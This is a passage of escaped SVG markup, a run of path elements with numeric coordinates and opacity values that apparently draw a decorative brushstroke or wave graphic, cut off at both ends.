.58,2.68,6.93,3.9a14.93,14.93,0,0,0,3.31.88c0-1.07-.14-2.14-.07-3.19s.2-3.15.54-3.2a34.09,34.09,0,0,1,7.62-.28c.21,0,.26,2.7.33,4.15a13.6,13.6,0,0,0,0,2.71c.31,1.18.71,3,1.46,3.27,1.8.53,4,2.17,6-.42-.76-.89-1.8-1.63-2.08-2.59a4.11,4.11,0,0,1,.35-3.22,75.25,75.25,0,0,1,5.12-5.76l-4.23-.85h-1.75a23.59,23.59,0,0,1-4.87.23c-4.93-.78-9.8-1.94-14.74-2.64A7.7,7.7,0,0,0,764.73,9a12.36,12.36,0,0,1-11.05.46c-.51-.21-1.33-.55-1.59-.33-3.85,3.18-5.5-2.22-8.51-2.15-.06,0-.12-.41-.18-.62l-1.29.11c-2.07,3.28-4.58,3-7.61-.72l-4,0-8.09,4c-1.32-.92-3.16-1.42-4.43,1.62-.64,1.52-2,1.41-2.69-.2A31.91,31.91,0,0,1,714.1,7l-4.7.72c-.26.87-.58,1.72-.79,2.59-.65,2.77-1.66,4.61-4.66,2a1.92,1.92,0,0,0-1.27-.45C694,12.55,686,9,677.53,7.84c-7.12-1-10.72,2.1-15.18,6.16l-.93-2.22c-2.34.47-4.46.84-6.55,1.35-1.41.35-2.76.91-4.14,1.36s-3,.95-4.43,1.4c-2.86.87-2.94,3.58-2.8,5.56.17,2.28,1.58,4.46,2.5,6.81,3.22-2.47,1.91-7.61,6.6-9-1.43,5.66-2.78,11-4.11,16.31h8.27l1.52-2L660.16,35a62.13,62.13,0,0,0,6.15-1,6.4,6.4,0,0,0,2.42-1.67c2.82-2.66,4.43-2.49,6.69.82.5.74.89,1.55,1.33,2.33l1.27,0c3.29-1.6,4.49.31,5,2.79,1.88.76,3.88,1,5,2.18a5.3,5.3,0,0,1,1.31,4.43,5.08,5.08,0,0,1-3.59,2.81,45.42,45.42,0,0,1-10.16,0,7.44,7.44,0,0,1-4.27-2.35c-2.85-3.18-3.63-3.18-5.73,1.12-.32-1.48-.56-2.59-1-4.78l-5.06,7.23c-8.42-4.81-7.21-4.6-12.22.4-1.86-2.11-4.43-4.06-6.74-2-1.57,1.36-6.06.63-5.15,4.57h7a17.25,17.25,0,0,1,.21,3.11,29.4,29.4,0,0,1-.88,3.44,13.22,13.22,0,0,1-3.1-1.4c-1.86-1.49-3.39-1.28-5.13.2a2.66,2.66,0,0,1-2.33.28c-.43-.18-.58-1.34-.58-2.07,0-2,.15-3.93.24-5.9l-1.5-.44-4.38,5.54c.44,2.07.87,4.15,1.3,6.21-5.57,1.5-5.57,1.5-5.65,3.89,1.33-.18,2.63-.43,3.94-.51A35.87,35.87,0,0,0,628.92,64.11Zm31-43c-.86-.22-1.49-1.36-2.23-2.1.66-.59,1.27-1.59,2-1.67s1.46.81,2.2,1.27c.2.44.4.87.59,1.31C661.61,20.33,660.63,21.25,659.92,21.08Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M985,55.33c1.46-2.15,3-1.15,4.76-.44,5.9,2.42,12,3.57,18.34,2.29.65-.12,2,.4,2.1.83.72,3.42,3.4,3.9,6.1,4.17,6.63.67,13.45,2.49,19-3.39.76-.81,2.85-.92,4.13-.58,4.64,1.21,9.25,2.57,13.75,4.2s7.75.24,9.1-4.07a10.62,10.62,0,0,1,.93-1.83c1.5,2.4,2.88,4.59,4.67,7.46,2-2.3,3.74-4.51,5.69-6.53.87-.9,2.23-2,3.22-1.92s2.08,1.55,2.91,2.57,1,2.73,1.83,3c3.21,1,6.57,1.61,9.87,2.35.5-1.36,1-2.72,1.44-3.87l-9.51-3.68c.26-2.06,1.18-4.23.5-5-1.34-1.55-3.45-2.5-5.7-.66-.7.57-2.06.26-3.1.48-1.46.31-3.25.32-4.28,1.19-2.55,2.15-5.08,1.41-8.44.93l6-4.6-.54-1c-2.62.6-5.77-1.68-7.81,2.27a75.78,75.78,0,0,1-4.52,7l-5-4.48c-3.75.55-7.67.15-11.14,2.29-.61.38-1.7,0-2.58,0-2.43-.07-5.53-1.09-7.16,0-2.81,1.92-5,3.09-8.39,1.6-1.68-.74-3.94-.25-5.58-1-5.87-2.85-11.71-3.89-17.88-1.09-.41.18-1.15-.31-1.71-.55s-1.53-1.05-1.94-.85c-4.21,2.08-8.5-2.77-12.67.18-.17.13-.9-.23-1.14-.54-1.95-2.59-3.37-1.33-4.72.6,2.66,1.1,5.3,2.25,8,3.27A1.59,1.59,0,0,0,985,55.33Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M409.63,67.73c2.4.08,4.82-.07,7.23-.13a2.58,2.58,0,0,1,1.94-.47,8.4,8.4,0,0,0,1.4.43,4.27,4.27,0,0,1,1.22.21c3.68.44,7.7-.46,10.67,2.75.18.2.62.21,1,.25l17.24,2.13v3.48l11.92-2c5.85-1,10,3.53,15.15,4.94,3.69,1,6.73,1.89,10-.58,1.47-1.11,2.59-3.55,5-1.2.17.17,1.73-.58,2.1-1.21a40.76,40.76,0,0,0,2.08-4.91l-3.05-1.14-2,1.35-.95.4-.4,1c-.4.62-1,1.83-1.18,1.77-3.22-1.15-7.18.12-9.79-3l-3.3-.12c-.48,2.5-2.2,2.1-3.94,1.71A45.91,45.91,0,0,0,467,72.33c-2.9-.35-6.4.42-8.61-1-4.34-2.7-8.77-1.22-13.12-1.78-3.89-.5-8-.54-11.59-1.87-5.92-2.19-11.91-1.64-17.91-1.77-2.64,0-5.27,1.05-7.93,1.07A2.23,2.23,0,0,0,409.63,67.73Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M528.33,60,532,62.45l1-.27,2.73-2.76,2,2.1a1.43,1.43,0,0,0,.16.57c2,2.19,1.8,4.12-.66,6.21a1.48,1.48,0,0,0-.19.57c0,.71.06,1.42.08,2.13.91,0,2.15.29,2.65-.18,2.74-2.53,4.64-1.92,6.27,1.18a2,2,0,0,0,1.64.63c.48-.5,1.07-1.51.86-2-1-2.06.52-5.25-2.83-6.36-.17,0,.1-3.21.62-3.36,5.07-1.48,8.48-7.13,14.61-5.91.16,0,.45-.66.68-1l-.74-1.36.07-.12-3.44-.5-8.15,0-4.79.53c-.91,2.39-1.8,4.34-5.06,2.42A10.91,10.91,0,0,0,534,54c-3.57.08-6.12,2.92-5.72,6Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M797.9,16.16c4.54,1.39,4.73,1.71,3.73,5.93,5.87,2.82,12.19.84,19.09,1.15L818.5,19c-2,1.22-3.54,2.9-4.49,2.61-2-.6-3.28-2.38-2.1-4.74l.71.53,3.64-3.57c-4-2.19-8.21-1.74-12.42-.6-1.08.29-2.19.49-3.28.74V9.76l-4,.62v.69C797,12.75,794.67,15.18,797.9,16.16Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M898.68,32.93A23.5,23.5,0,0,1,905,36.22c2.23,1.52,4.15,3.79,7.08,1.3a1.55,1.55,0,0,1,1.24-.28c3.11,1,6.21,2.07,9.67,3.24a6.75,6.75,0,0,1,8.71,1.39c1.94,2.4,6.73,2.33,9.15-.14a9.88,9.88,0,0,0-2.6-1.37c-8.16-1.43-15.42-6.32-23.95-6.26-2,.87-3.89,1.8-5.89,2.54-.32.12-1.27-.57-1.38-1a2.27,2.27,0,0,1,.64-1.7,19.13,19.13,0,0,1,2.13-1.87l-.15-.16-2.89-.56a48.5,48.5,0,0,0-5.84-2.1,17.66,17.66,0,0,0-4.35.07C896.65,30.87,896.43,32.29,898.68,32.93Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n          opacity=\"0.1\"></path>\n        <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n          transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n        <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n          opacity=\"0.6\"></path>\n        <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path 